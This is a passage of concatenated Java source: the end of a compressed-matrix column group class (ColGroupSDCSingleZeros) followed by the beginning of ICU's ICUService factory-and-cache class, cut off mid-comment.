final int alen = sb.size(r) + apos; final int[] aix = sb.indexes(r); final double[] avals = sb.values(r); double ret = 0; int i = it.value(); int j = apos; while(i < last && j < alen) { final int idx = aix[j]; if(idx == i) { ret += avals[j++]; i = it.next(); } else if(idx < i) j++; else i = it.next(); } while(j < alen && aix[j] < last) j++; if(j < alen && aix[j] == last) ret += avals[j]; preAgg[0] = ret; } private static void preAggregateSparseMultiRow(final SparseBlock sb, final double[] preAgg, final int rl, final int ru, final int last, final AOffsetIterator it) { int i = it.value(); final int[] aOffs = new int[ru - rl]; // Initialize offsets for each row for(int r = rl; r < ru; r++) aOffs[r - rl] = sb.pos(r); while(i < last) { // while we are not done iterating for(int r = rl; r < ru; r++) { if(sb.isEmpty(r)) continue; final int off = r - rl; int apos = aOffs[off]; // current offset final int alen = sb.size(r) + sb.pos(r); final int[] aix = sb.indexes(r); while(apos < alen && aix[apos] < i)// increment all pointers to offset apos++; if(apos < alen && aix[apos] == i) preAgg[off] += sb.values(r)[apos]; aOffs[off] = apos; } i = it.next(); } // process final element for(int r = rl; r < ru; r++) { if(sb.isEmpty(r)) continue; final int off = r - rl; int apos = aOffs[off]; final int alen = sb.size(r) + sb.pos(r); final int[] aix = sb.indexes(r); while(apos < alen && aix[apos] < last) apos++; if(apos < alen && aix[apos] == last) preAgg[off] += sb.values(r)[apos]; aOffs[off] = apos; } } @Override public long estimateInMemorySize() { long size = super.estimateInMemorySize(); size += _indexes.getInMemorySize(); return size; } @Override public AColGroup scalarOperation(ScalarOperator op) { final double val0 = op.executeScalar(0); final boolean isSparseSafeOp = val0 == 0; final IDictionary nDict = _dict.applyScalarOp(op); if(isSparseSafeOp) return create(_colIndexes, _numRows, nDict, _indexes, getCachedCounts()); else { final double[] defaultTuple = new 
double[_colIndexes.size()]; Arrays.fill(defaultTuple, val0); return ColGroupSDCSingle.create(_colIndexes, _numRows, nDict, defaultTuple, _indexes, getCachedCounts()); } } @Override public AColGroup unaryOperation(UnaryOperator op) { final double val0 = op.fn.execute(0); final IDictionary nDict = _dict.applyUnaryOp(op); if(val0 == 0) return create(_colIndexes, _numRows, nDict, _indexes, getCachedCounts()); else { final double[] defaultTuple = new double[_colIndexes.size()]; Arrays.fill(defaultTuple, val0); return ColGroupSDCSingle.create(_colIndexes, _numRows, nDict, defaultTuple, _indexes, getCachedCounts()); } } @Override protected double computeMxx(double c, Builtin builtin) { c = builtin.execute(c, 0); return _dict.aggregate(c, builtin); } @Override protected void computeColMxx(double[] c, Builtin builtin) { for(int x = 0; x < _colIndexes.size(); x++) c[_colIndexes.get(x)] = builtin.execute(c[_colIndexes.get(x)], 0); _dict.aggregateCols(c, builtin, _colIndexes); } @Override public boolean containsValue(double pattern) { return (pattern == 0) || _dict.containsValue(pattern); } @Override public AColGroup binaryRowOpLeft(BinaryOperator op, double[] v, boolean isRowSafe) { if(isRowSafe) { IDictionary ret = _dict.binOpLeft(op, v, _colIndexes); return ColGroupSDCSingleZeros.create(_colIndexes, _numRows, ret, _indexes, getCachedCounts()); } else { IDictionary newDict = _dict.binOpLeft(op, v, _colIndexes); double[] defaultTuple = new double[_colIndexes.size()]; for(int i = 0; i < _colIndexes.size(); i++) defaultTuple[i] = op.fn.execute(v[_colIndexes.get(i)], 0); return ColGroupSDCSingle.create(_colIndexes, _numRows, newDict, defaultTuple, _indexes, getCachedCounts()); } } @Override public AColGroup binaryRowOpRight(BinaryOperator op, double[] v, boolean isRowSafe) { if(isRowSafe) { IDictionary ret = _dict.binOpRight(op, v, _colIndexes); return ColGroupSDCSingleZeros.create(_colIndexes, _numRows, ret, _indexes, getCachedCounts()); } else { IDictionary newDict = 
_dict.binOpRight(op, v, _colIndexes); double[] defaultTuple = new double[_colIndexes.size()]; for(int i = 0; i < _colIndexes.size(); i++) defaultTuple[i] = op.fn.execute(0, v[_colIndexes.get(i)]); return ColGroupSDCSingle.create(_colIndexes, _numRows, newDict, defaultTuple, _indexes, getCachedCounts()); } } @Override public void write(DataOutput out) throws IOException { super.write(out); _indexes.write(out); } public static ColGroupSDCSingleZeros read(DataInput in, int nRows) throws IOException { IColIndex cols = ColIndexFactory.read(in); IDictionary dict = DictionaryFactory.read(in); AOffset indexes = OffsetFactory.readIn(in); return new ColGroupSDCSingleZeros(cols, nRows, dict, indexes, null); } @Override public long getExactSizeOnDisk() { long ret = super.getExactSizeOnDisk(); ret += _indexes.getExactSizeOnDisk(); return ret; } @Override public boolean sameIndexStructure(AColGroupCompressed that) { if(that instanceof ColGroupSDCSingleZeros) { ColGroupSDCSingleZeros th = (ColGroupSDCSingleZeros) that; return th._indexes == _indexes; } else if(that instanceof ColGroupSDCSingle) { ColGroupSDCSingle th = (ColGroupSDCSingle) that; return th._indexes == _indexes; } else return false; } @Override protected AColGroup fixColIndexes(IColIndex newColIndex, int[] reordering) { return ColGroupSDCSingleZeros.create(newColIndex, getNumRows(), _dict.reorder(reordering), _indexes, getCachedCounts()); } @Override public void preAggregateThatDDCStructure(ColGroupDDC that, Dictionary ret) { final AOffsetIterator itThis = _indexes.getOffsetIterator(); final int nCol = that._colIndexes.size(); final int finalOffThis = _indexes.getOffsetToLast(); final double[] rV = ret.getValues(); if(nCol == 1) preAggregateThatDDCStructureSingleCol(that, rV, itThis, finalOffThis); else preAggregateThatDDCStructureMultiCol(that, rV, itThis, finalOffThis, nCol); } private void preAggregateThatDDCStructureSingleCol(ColGroupDDC that, double[] rV, AOffsetIterator itThis, int finalOffThis) { double rv = 
0; final double[] tV = that._dict.getValues(); while(true) { final int v = itThis.value(); rv += tV[that._data.getIndex(v)]; if(v >= finalOffThis) break; itThis.next(); } rV[0] += rv; } private void preAggregateThatDDCStructureMultiCol(ColGroupDDC that, double[] rV, AOffsetIterator itThis, int finalOffThis, int nCol) { while(true) { final int v = itThis.value(); final int fr = that._data.getIndex(v); that._dict.addToEntry(rV, fr, 0, nCol); if(v >= finalOffThis) break; itThis.next(); } } @Override public void preAggregateThatSDCZerosStructure(ColGroupSDCZeros that, Dictionary ret) { final AIterator itThat = that._indexes.getIterator(); final AOffsetIterator itThis = _indexes.getOffsetIterator(); final int nCol = that._colIndexes.size(); final int finalOffThis = _indexes.getOffsetToLast(); final int finalOffThat = that._indexes.getOffsetToLast(); final double[] rV = ret.getValues(); if(nCol == 1) preAggregateThatSDCZerosStructureSingleCol(that, rV, itThat, finalOffThat, itThis, finalOffThis); else preAggregateThatSDCZerosStructureMultiCol(that, rV, itThat, finalOffThat, itThis, finalOffThis, nCol); } private void preAggregateThatSDCZerosStructureSingleCol(ColGroupSDCZeros that, double[] rV, AIterator itThat, int finalOffThat, AOffsetIterator itThis, int finalOffThis) { double rv = 0; final double[] tV = that._dict.getValues(); while(true) { final int tv = itThat.value(); final int v = itThis.value(); if(tv == v) { rv += tV[that._data.getIndex(itThat.getDataIndex())]; if(tv >= finalOffThat || v >= finalOffThis) break; itThat.next(); itThis.next(); } else if(tv < v) { if(tv >= finalOffThat) break; itThat.next(); } else { if(v >= finalOffThis) break; itThis.next(); } } rV[0] += rv; } private void preAggregateThatSDCZerosStructureMultiCol(ColGroupSDCZeros that, double[] rV, AIterator itThat, int finalOffThat, AOffsetIterator itThis, int finalOffThis, int nCol) { while(true) { final int tv = itThat.value(); final int v = itThis.value(); if(tv == v) { 
that._dict.addToEntry(rV, that._data.getIndex(itThat.getDataIndex()), 0, nCol); if(tv >= finalOffThat || v >= finalOffThis) break; itThat.next(); itThis.next(); } else if(tv < v) { if(tv >= finalOffThat) break; itThat.next(); } else { if(v >= finalOffThis) break; itThis.next(); } } } @Override public void preAggregateThatSDCSingleZerosStructure(ColGroupSDCSingleZeros that, Dictionary ret) { final int nCol = that._colIndexes.size(); final AOffsetIterator itThis = _indexes.getOffsetIterator(); final AOffsetIterator itThat = that._indexes.getOffsetIterator(); final int finalOffThis = _indexes.getOffsetToLast(); final int finalOffThat = that._indexes.getOffsetToLast(); int count = 0; int tv = itThat.value(); int v = itThis.value(); while(tv < finalOffThat && v < finalOffThis) { if(tv == v) { count++; tv = itThat.next(); v = itThis.next(); } else if(tv < v) tv = itThat.next(); else v = itThis.next(); } while(tv < finalOffThat && tv < v) tv = itThat.next(); while(v < finalOffThis && v < tv) v = itThis.next(); if(tv == v) count++; that._dict.addToEntry(ret.getValues(), 0, 0, nCol, count); } @Override protected void preAggregateThatRLEStructure(ColGroupRLE that, Dictionary ret) { final int finalOff = _indexes.getOffsetToLast(); final double[] v = ret.getValues(); final int nv = that.getNumValues(); final int nCol = that._colIndexes.size(); for(int k = 0; k < nv; k++) { final AOffsetIterator itThis = _indexes.getOffsetIterator(); final int blen = that._ptr[k + 1]; for(int apos = that._ptr[k], rs = 0, re = 0; apos < blen; apos += 2) { rs = re + that._data[apos]; re = rs + that._data[apos + 1]; // if index is later than run continue if(itThis.value() >= re || rs == re || rs > finalOff) continue; // while lower than run iterate through while(itThis.value() < rs && itThis.value() != finalOff) itThis.next(); // process inside run for(int rix = itThis.value(); rix < re; rix = itThis.value()) { // nice skip inside runs that._dict.addToEntry(v, k, 0, nCol); if(itThis.value() == 
finalOff) // break if final. break; itThis.next(); } } } } @Override public int getPreAggregateSize() { return 1; } @Override public AColGroup replace(double pattern, double replace) { IDictionary replaced = _dict.replace(pattern, replace, _colIndexes.size()); if(pattern == 0) { double[] defaultTuple = new double[_colIndexes.size()]; for(int i = 0; i < _colIndexes.size(); i++) defaultTuple[i] = replace; return ColGroupSDCSingle.create(_colIndexes, _numRows, replaced, defaultTuple, _indexes, getCachedCounts()); } return copyAndSet(replaced); } @Override protected void computeProduct(double[] c, int nRows) { c[0] = 0; } @Override protected void computeColProduct(double[] c, int nRows) { for(int i = 0; i < _colIndexes.size(); i++) c[_colIndexes.get(i)] = 0; } @Override public double getCost(ComputationCostEstimator e, int nRows) { final int nVals = getNumValues(); final int nCols = getNumCols(); final int nRowsScanned = getCounts()[0]; return e.getCost(nRows, nRowsScanned, nCols, nVals, _dict.getSparsity()); } @Override protected int numRowsToMultiply() { return getCounts()[0]; } @Override protected AColGroup allocateRightMultiplication(MatrixBlock right, IColIndex colIndexes, IDictionary preAgg) { if(colIndexes != null && preAgg != null) return create(colIndexes, _numRows, preAgg, _indexes, getCachedCounts()); else return null; } @Override public AColGroup sliceRows(int rl, int ru) { OffsetSliceInfo off = _indexes.slice(rl, ru); if(off.lIndex == -1) return null; if(CompressedMatrixBlock.debug) { if(off.offsetSlice.getOffsetToFirst() < 0 || off.offsetSlice.getOffsetToLast() > ru - rl) throw new DMLCompressionException("Failed to slice : " + rl + " " + ru + " in: " + this); } return create(_colIndexes, ru - rl, _dict, off.offsetSlice, null); } @Override protected AColGroup copyAndSet(IColIndex colIndexes, IDictionary newDictionary) { return create(colIndexes, _numRows, newDictionary, _indexes, getCachedCounts()); } @Override public AColGroup append(AColGroup g) { 
return null; } @Override public AColGroup appendNInternal(AColGroup[] g, int blen, int rlen) { for(int i = 1; i < g.length; i++) { final AColGroup gs = g[i]; if(!_colIndexes.equals(gs._colIndexes)) { LOG.warn("Not same columns therefore not appending \n" + _colIndexes + "\n\n" + gs._colIndexes); return null; } if(!(gs instanceof AOffsetsGroup)) { LOG.warn("Not SDCFOR but " + gs.getClass().getSimpleName()); return null; } if(gs instanceof ColGroupSDCSingleZeros) { final ColGroupSDCSingleZeros gc = (ColGroupSDCSingleZeros) gs; if(!gc._dict.equals(_dict)) { LOG.warn("Not same Dictionaries therefore not appending \n" + _dict + "\n\n" + gc._dict); return null; } } } AOffset no = _indexes.appendN(Arrays.copyOf(g, g.length, AOffsetsGroup[].class), blen); return create(_colIndexes, rlen, _dict, no, null); } @Override public AColGroup recompress() { return this; } @Override public IEncode getEncoding() { return EncodingFactory.create(new MapToZero(getCounts()[0]), _indexes, _numRows); } @Override public int getNumberOffsets() { return getCounts()[0]; } @Override protected void sparseSelection(MatrixBlock selection, P[] points, MatrixBlock ret, int rl, int ru) { throw new NotImplementedException(); } @Override protected void denseSelection(MatrixBlock selection, P[] points, MatrixBlock ret, int rl, int ru) { throw new NotImplementedException(); } protected void decompressToDenseBlockTransposedSparseDictionary(DenseBlock db, int rl, int ru, SparseBlock sb) { throw new NotImplementedException(); } @Override protected void decompressToDenseBlockTransposedDenseDictionary(DenseBlock db, int rl, int ru, double[] dict) { throw new NotImplementedException(); } @Override protected void decompressToSparseBlockTransposedSparseDictionary(SparseBlockMCSR db, SparseBlock sb, int nColOut) { throw new NotImplementedException(); } @Override protected void decompressToSparseBlockTransposedDenseDictionary(SparseBlockMCSR db, double[] dict, int nColOut) { throw new NotImplementedException(); } 
@Override public AColGroupCompressed combineWithSameIndex(int nRow, int nCol, AColGroup right) { ColGroupSDCSingleZeros rightSDC = ((ColGroupSDCSingleZeros) right); IDictionary b = rightSDC.getDictionary(); IDictionary combined = DictionaryFactory.cBindDictionaries(_dict, b, this.getNumCols(), right.getNumCols()); IColIndex combinedColIndex = _colIndexes.combine(right.getColIndices().shift(nCol)); return new ColGroupSDCSingleZeros(combinedColIndex, this.getNumRows(), combined, _indexes, getCachedCounts()); } @Override public AColGroupCompressed combineWithSameIndex(int nRow, int nCol, List<AColGroup> right) { final IDictionary combined = combineDictionaries(nCol, right); final IColIndex combinedColIndex = combineColIndexes(nCol, right); // return new ColGroupDDC(combinedColIndex, combined, _data, getCachedCounts()); return new ColGroupSDCSingleZeros(combinedColIndex, this.getNumRows(), combined, _indexes, getCachedCounts()); } @Override public AColGroup[] splitReshape(int multiplier, int nRow, int nColOrg) { IntArrayList[] splitOffs = new IntArrayList[multiplier]; for(int i = 0; i < multiplier; i++) splitOffs[i] = new IntArrayList(); AIterator it = _indexes.getIterator(); final int last = _indexes.getOffsetToLast(); while(it.value() != last) { final int v = it.value(); // offset final int outV = v / multiplier; final int outM = v % multiplier; splitOffs[outM].appendValue(outV); it.next(); } // last value final int v = it.value(); final int outV = v / multiplier; final int outM = v % multiplier; splitOffs[outM].appendValue(outV); // iterate through all rows. AOffset[] offs = new AOffset[multiplier]; for(int i = 0; i < multiplier; i++) offs[i] = OffsetFactory.createOffset(splitOffs[i]); // assign columns AColGroup[] res = new AColGroup[multiplier]; for(int i = 0; i < multiplier; i++) { final IColIndex ci = i == 0 ? 
_colIndexes : _colIndexes.shift(i * nColOrg); res[i] = create(ci, _numRows / multiplier, _dict, offs[i], null); } return res; } @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append(super.toString()); sb.append(String.format("\n%15s", "Indexes: ")); sb.append(_indexes.toString()); return sb.toString(); } }
google/j2objc
35,914
jre_emul/android/platform/external/icu/android_icu4j/src/main/java/android/icu/impl/ICUService.java
/* GENERATED SOURCE. DO NOT MODIFY. */ // © 2016 and later: Unicode, Inc. and others. // License & terms of use: http://www.unicode.org/copyright.html#License /** ******************************************************************************* * Copyright (C) 2001-2016, International Business Machines Corporation and * others. All Rights Reserved. ******************************************************************************* */ package android.icu.impl; import java.util.ArrayList; import java.util.Collections; import java.util.Comparator; import java.util.EventListener; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.ListIterator; import java.util.Map; import java.util.Map.Entry; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import java.util.concurrent.ConcurrentHashMap; import android.icu.util.ULocale; import android.icu.util.ULocale.Category; /** * <p>A Service provides access to service objects that implement a * particular service, e.g. transliterators. Users provide a String * id (for example, a locale string) to the service, and get back an * object for that id. Service objects can be any kind of object. * The service object is cached and returned for later queries, so * generally it should not be mutable, or the caller should clone the * object before modifying it.</p> * * <p>Services 'canonicalize' the query id and use the canonical id to * query for the service. The service also defines a mechanism to * 'fallback' the id multiple times. Clients can optionally request * the actual id that was matched by a query when they use an id to * retrieve a service object.</p> * * <p>Service objects are instantiated by Factory objects registered with * the service. The service queries each Factory in turn, from most recently * registered to earliest registered, until one returns a service object. 
* If none responds with a service object, a fallback id is generated, * and the process repeats until a service object is returned or until * the id has no further fallbacks.</p> * * <p>Factories can be dynamically registered and unregistered with the * service. When registered, a Factory is installed at the head of * the factory list, and so gets 'first crack' at any keys or fallback * keys. When unregistered, it is removed from the service and can no * longer be located through it. Service objects generated by this * factory and held by the client are unaffected.</p> * * <p>ICUService uses Keys to query factories and perform * fallback. The Key defines the canonical form of the id, and * implements the fallback strategy. Custom Keys can be defined that * parse complex IDs into components that Factories can more easily * use. The Key can cache the results of this parsing to save * repeated effort. ICUService provides convenience APIs that * take Strings and generate default Keys for use in querying.</p> * * <p>ICUService provides API to get the list of ids publicly * supported by the service (although queries aren't restricted to * this list). This list contains only 'simple' IDs, and not fully * unique ids. Factories are associated with each simple ID and * the responsible factory can also return a human-readable localized * version of the simple ID, for use in user interfaces. ICUService * can also provide a sorted collection of the all the localized visible * ids.</p> * * <p>ICUService implements ICUNotifier, so that clients can register * to receive notification when factories are added or removed from * the service. ICUService provides a default EventListener subinterface, * ServiceListener, which can be registered with the service. 
When * the service changes, the ServiceListener's serviceChanged method * is called, with the service as the only argument.</p> * * <p>The ICUService API is both rich and generic, and it is expected * that most implementations will statically 'wrap' ICUService to * present a more appropriate API-- for example, to declare the type * of the objects returned from get, to limit the factories that can * be registered with the service, or to define their own listener * interface with a custom callback method. They might also customize * ICUService by overriding it, for example, to customize the Key and * fallback strategy. ICULocaleService is a customized service that * uses Locale names as ids and uses Keys that implement the standard * resource bundle fallback strategy.<p> * @hide Only a subset of ICU is exposed in Android */ public class ICUService extends ICUNotifier { /** * Name used for debugging. */ protected final String name; /** * Constructor. */ public ICUService() { name = ""; } private static final boolean DEBUG = ICUDebug.enabled("service"); /** * Construct with a name (useful for debugging). */ public ICUService(String name) { this.name = name; } /** * Access to factories is protected by a read-write lock. This is * to allow multiple threads to read concurrently, but keep * changes to the factory list atomic with respect to all readers. */ private final ICURWLock factoryLock = new ICURWLock(); /** * All the factories registered with this service. */ private final List<Factory> factories = new ArrayList<Factory>(); /** * Record the default number of factories for this service. * Can be set by markDefault. */ private int defaultSize = 0; /** * Keys are used to communicate with factories to generate an * instance of the service. 
Keys define how ids are * canonicalized, provide both a current id and a current * descriptor to use in querying the cache and factories, and * determine the fallback strategy.</p> * * <p>Keys provide both a currentDescriptor and a currentID. * The descriptor contains an optional prefix, followed by '/' * and the currentID. Factories that handle complex keys, * for example number format factories that generate multiple * kinds of formatters for the same locale, use the descriptor * to provide a fully unique identifier for the service object, * while using the currentID (in this case, the locale string), * as the visible IDs that can be localized. * * <p> The default implementation of Key has no fallbacks and * has no custom descriptors.</p> */ public static class Key { private final String id; /** * Construct a key from an id. */ public Key(String id) { this.id = id; } /** * Return the original ID used to construct this key. */ public final String id() { return id; } /** * Return the canonical version of the original ID. This implementation * returns the original ID unchanged. */ public String canonicalID() { return id; } /** * Return the (canonical) current ID. This implementation * returns the canonical ID. */ public String currentID() { return canonicalID(); } /** * Return the current descriptor. This implementation returns * the current ID. The current descriptor is used to fully * identify an instance of the service in the cache. A * factory may handle all descriptors for an ID, or just a * particular descriptor. The factory can either parse the * descriptor or use custom API on the key in order to * instantiate the service. */ public String currentDescriptor() { return "/" + currentID(); } /** * If the key has a fallback, modify the key and return true, * otherwise return false. The current ID will change if there * is a fallback. No currentIDs should be repeated, and fallback * must eventually return false. 
This implmentation has no fallbacks * and always returns false. */ public boolean fallback() { return false; } /** * If a key created from id would eventually fallback to match the * canonical ID of this key, return true. */ public boolean isFallbackOf(String idToCheck) { return canonicalID().equals(idToCheck); } } /** * Factories generate the service objects maintained by the * service. A factory generates a service object from a key, * updates id->factory mappings, and returns the display name for * a supported id. */ public static interface Factory { /** * Create a service object from the key, if this factory * supports the key. Otherwise, return null. * * <p>If the factory supports the key, then it can call * the service's getKey(Key, String[], Factory) method * passing itself as the factory to get the object that * the service would have created prior to the factory's * registration with the service. This can change the * key, so any information required from the key should * be extracted before making such a callback. */ public Object create(Key key, ICUService service); /** * Update the result IDs (not descriptors) to reflect the IDs * this factory handles. This function and getDisplayName are * used to support ICUService.getDisplayNames. Basically, the * factory has to determine which IDs it will permit to be * available, and of those, which it will provide localized * display names for. In most cases this reflects the IDs that * the factory directly supports. */ public void updateVisibleIDs(Map<String, Factory> result); /** * Return the display name for this id in the provided locale. * This is an localized id, not a descriptor. If the id is * not visible or not defined by the factory, return null. * If locale is null, return id unchanged. */ public String getDisplayName(String id, ULocale locale); } /** * A default implementation of factory. 
This provides default * implementations for subclasses, and implements a singleton * factory that matches a single id and returns a single * (possibly deferred-initialized) instance. This implements * updateVisibleIDs to add a mapping from its ID to itself * if visible is true, or to remove any existing mapping * for its ID if visible is false. */ public static class SimpleFactory implements Factory { protected Object instance; protected String id; protected boolean visible; /** * Convenience constructor that calls SimpleFactory(Object, String, boolean) * with visible true. */ public SimpleFactory(Object instance, String id) { this(instance, id, true); } /** * Construct a simple factory that maps a single id to a single * service instance. If visible is true, the id will be visible. * Neither the instance nor the id can be null. */ public SimpleFactory(Object instance, String id, boolean visible) { if (instance == null || id == null) { throw new IllegalArgumentException("Instance or id is null"); } this.instance = instance; this.id = id; this.visible = visible; } /** * Return the service instance if the factory's id is equal to * the key's currentID. Service is ignored. */ @Override public Object create(Key key, ICUService service) { if (id.equals(key.currentID())) { return instance; } return null; } /** * If visible, adds a mapping from id -> this to the result, * otherwise removes id from result. */ @Override public void updateVisibleIDs(Map<String, Factory> result) { if (visible) { result.put(id, this); } else { result.remove(id); } } /** * If this.id equals id, returns id regardless of locale, * otherwise returns null. (This default implementation has * no localized id information.) */ @Override public String getDisplayName(String identifier, ULocale locale) { return (visible && id.equals(identifier)) ? identifier : null; } /** * For debugging. 
*/ @Override public String toString() { StringBuilder buf = new StringBuilder(super.toString()); buf.append(", id: "); buf.append(id); buf.append(", visible: "); buf.append(visible); return buf.toString(); } } /** * Convenience override for get(String, String[]). This uses * createKey to create a key for the provided descriptor. */ public Object get(String descriptor) { return getKey(createKey(descriptor), null); } /** * Convenience override for get(Key, String[]). This uses * createKey to create a key from the provided descriptor. */ public Object get(String descriptor, String[] actualReturn) { if (descriptor == null) { throw new NullPointerException("descriptor must not be null"); } return getKey(createKey(descriptor), actualReturn); } /** * Convenience override for get(Key, String[]). */ public Object getKey(Key key) { return getKey(key, null); } /** * <p>Given a key, return a service object, and, if actualReturn * is not null, the descriptor with which it was found in the * first element of actualReturn. If no service object matches * this key, return null, and leave actualReturn unchanged.</p> * * <p>This queries the cache using the key's descriptor, and if no * object in the cache matches it, tries the key on each * registered factory, in order. 
If none generates a service * object for the key, repeats the process with each fallback of * the key, until either one returns a service object, or the key * has no fallback.</p> * * <p>If key is null, just returns null.</p> */ public Object getKey(Key key, String[] actualReturn) { return getKey(key, actualReturn, null); } // debugging // Map hardRef; public Object getKey(Key key, String[] actualReturn, Factory factory) { if (factories.size() == 0) { return handleDefault(key, actualReturn); } if (DEBUG) System.out.println("Service: " + name + " key: " + key.canonicalID()); CacheEntry result = null; if (key != null) { try { // The factory list can't be modified until we're done, // otherwise we might update the cache with an invalid result. // The cache has to stay in synch with the factory list. factoryLock.acquireRead(); Map<String, CacheEntry> cache = this.cache; // copy so we don't need to sync on this if (cache == null) { if (DEBUG) System.out.println("Service " + name + " cache was empty"); // synchronized since additions and queries on the cache must be atomic // they can be interleaved, though cache = new ConcurrentHashMap<String, CacheEntry>(); } String currentDescriptor = null; ArrayList<String> cacheDescriptorList = null; boolean putInCache = false; int NDebug = 0; int startIndex = 0; int limit = factories.size(); boolean cacheResult = true; if (factory != null) { for (int i = 0; i < limit; ++i) { if (factory == factories.get(i)) { startIndex = i + 1; break; } } if (startIndex == 0) { throw new IllegalStateException("Factory " + factory + "not registered with service: " + this); } cacheResult = false; } outer: do { currentDescriptor = key.currentDescriptor(); if (DEBUG) System.out.println(name + "[" + NDebug++ + "] looking for: " + currentDescriptor); result = cache.get(currentDescriptor); if (result != null) { if (DEBUG) System.out.println(name + " found with descriptor: " + currentDescriptor); break outer; } else { if (DEBUG) System.out.println("did 
not find: " + currentDescriptor + " in cache"); } // first test of cache failed, so we'll have to update // the cache if we eventually succeed-- that is, if we're // going to update the cache at all. putInCache = cacheResult; // int n = 0; int index = startIndex; while (index < limit) { Factory f = factories.get(index++); if (DEBUG) System.out.println("trying factory[" + (index-1) + "] " + f.toString()); Object service = f.create(key, this); if (service != null) { result = new CacheEntry(currentDescriptor, service); if (DEBUG) System.out.println(name + " factory supported: " + currentDescriptor + ", caching"); break outer; } else { if (DEBUG) System.out.println("factory did not support: " + currentDescriptor); } } // prepare to load the cache with all additional ids that // will resolve to result, assuming we'll succeed. We // don't want to keep querying on an id that's going to // fallback to the one that succeeded, we want to hit the // cache the first time next goaround. if (cacheDescriptorList == null) { cacheDescriptorList = new ArrayList<String>(5); } cacheDescriptorList.add(currentDescriptor); } while (key.fallback()); if (result != null) { if (putInCache) { if (DEBUG) System.out.println("caching '" + result.actualDescriptor + "'"); cache.put(result.actualDescriptor, result); if (cacheDescriptorList != null) { for (String desc : cacheDescriptorList) { if (DEBUG) System.out.println(name + " adding descriptor: '" + desc + "' for actual: '" + result.actualDescriptor + "'"); cache.put(desc, result); } } // Atomic update. We held the read lock all this time // so we know our cache is consistent with the factory list. // We might stomp over a cache that some other thread // rebuilt, but that's the breaks. They're both good. 
this.cache = cache; } if (actualReturn != null) { // strip null prefix if (result.actualDescriptor.indexOf("/") == 0) { actualReturn[0] = result.actualDescriptor.substring(1); } else { actualReturn[0] = result.actualDescriptor; } } if (DEBUG) System.out.println("found in service: " + name); return result.service; } } finally { factoryLock.releaseRead(); } } if (DEBUG) System.out.println("not found in service: " + name); return handleDefault(key, actualReturn); } private Map<String, CacheEntry> cache; // Record the actual id for this service in the cache, so we can return it // even if we succeed later with a different id. private static final class CacheEntry { final String actualDescriptor; final Object service; CacheEntry(String actualDescriptor, Object service) { this.actualDescriptor = actualDescriptor; this.service = service; } } /** * Default handler for this service if no factory in the list * handled the key. */ protected Object handleDefault(Key key, String[] actualIDReturn) { return null; } /** * Convenience override for getVisibleIDs(String) that passes null * as the fallback, thus returning all visible IDs. */ public Set<String> getVisibleIDs() { return getVisibleIDs(null); } /** * <p>Return a snapshot of the visible IDs for this service. This * set will not change as Factories are added or removed, but the * supported ids will, so there is no guarantee that all and only * the ids in the returned set are visible and supported by the * service in subsequent calls.</p> * * <p>matchID is passed to createKey to create a key. If the * key is not null, it is used to filter out ids that don't have * the key as a fallback. 
*/ public Set<String> getVisibleIDs(String matchID) { Set<String> result = getVisibleIDMap().keySet(); Key fallbackKey = createKey(matchID); if (fallbackKey != null) { Set<String> temp = new HashSet<String>(result.size()); for (String id : result) { if (fallbackKey.isFallbackOf(id)) { temp.add(id); } } result = temp; } return result; } /** * Return a map from visible ids to factories. */ private Map<String, Factory> getVisibleIDMap() { synchronized (this) { // or idcache-only lock? if (idcache == null) { try { factoryLock.acquireRead(); Map<String, Factory> mutableMap = new HashMap<String, Factory>(); ListIterator<Factory> lIter = factories.listIterator(factories.size()); while (lIter.hasPrevious()) { Factory f = lIter.previous(); f.updateVisibleIDs(mutableMap); } this.idcache = Collections.unmodifiableMap(mutableMap); } finally { factoryLock.releaseRead(); } } } return idcache; } private Map<String, Factory> idcache; /** * Convenience override for getDisplayName(String, ULocale) that * uses the current default locale. */ public String getDisplayName(String id) { return getDisplayName(id, ULocale.getDefault(Category.DISPLAY)); } /** * Given a visible id, return the display name in the requested locale. * If there is no directly supported id corresponding to this id, return * null. */ public String getDisplayName(String id, ULocale locale) { Map<String, Factory> m = getVisibleIDMap(); Factory f = m.get(id); if (f != null) { return f.getDisplayName(id, locale); } Key key = createKey(id); while (key.fallback()) { f = m.get(key.currentID()); if (f != null) { return f.getDisplayName(id, locale); } } return null; } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses the current default Locale as the locale, null as * the comparator, and null for the matchID. 
*/ public SortedMap<String, String> getDisplayNames() { ULocale locale = ULocale.getDefault(Category.DISPLAY); return getDisplayNames(locale, null, null); } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses null for the comparator, and null for the matchID. */ public SortedMap<String, String> getDisplayNames(ULocale locale) { return getDisplayNames(locale, null, null); } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses null for the matchID, thus returning all display names. */ public SortedMap<String, String> getDisplayNames(ULocale locale, Comparator<Object> com) { return getDisplayNames(locale, com, null); } /** * Convenience override of getDisplayNames(ULocale, Comparator, String) that * uses null for the comparator. */ public SortedMap<String, String> getDisplayNames(ULocale locale, String matchID) { return getDisplayNames(locale, null, matchID); } /** * Return a snapshot of the mapping from display names to visible * IDs for this service. This set will not change as factories * are added or removed, but the supported ids will, so there is * no guarantee that all and only the ids in the returned map will * be visible and supported by the service in subsequent calls, * nor is there any guarantee that the current display names match * those in the set. The display names are sorted based on the * comparator provided. 
*/ public SortedMap<String, String> getDisplayNames(ULocale locale, Comparator<Object> com, String matchID) { SortedMap<String, String> dncache = null; LocaleRef ref = dnref; if (ref != null) { dncache = ref.get(locale, com); } while (dncache == null) { synchronized (this) { if (ref == dnref || dnref == null) { dncache = new TreeMap<String, String>(com); // sorted Map<String, Factory> m = getVisibleIDMap(); Iterator<Entry<String, Factory>> ei = m.entrySet().iterator(); while (ei.hasNext()) { Entry<String, Factory> e = ei.next(); String id = e.getKey(); Factory f = e.getValue(); dncache.put(f.getDisplayName(id, locale), id); } dncache = Collections.unmodifiableSortedMap(dncache); dnref = new LocaleRef(dncache, locale, com); } else { ref = dnref; dncache = ref.get(locale, com); } } } Key matchKey = createKey(matchID); if (matchKey == null) { return dncache; } SortedMap<String, String> result = new TreeMap<String, String>(dncache); Iterator<Entry<String, String>> iter = result.entrySet().iterator(); while (iter.hasNext()) { Entry<String, String> e = iter.next(); if (!matchKey.isFallbackOf(e.getValue())) { iter.remove(); } } return result; } // we define a class so we get atomic simultaneous access to the 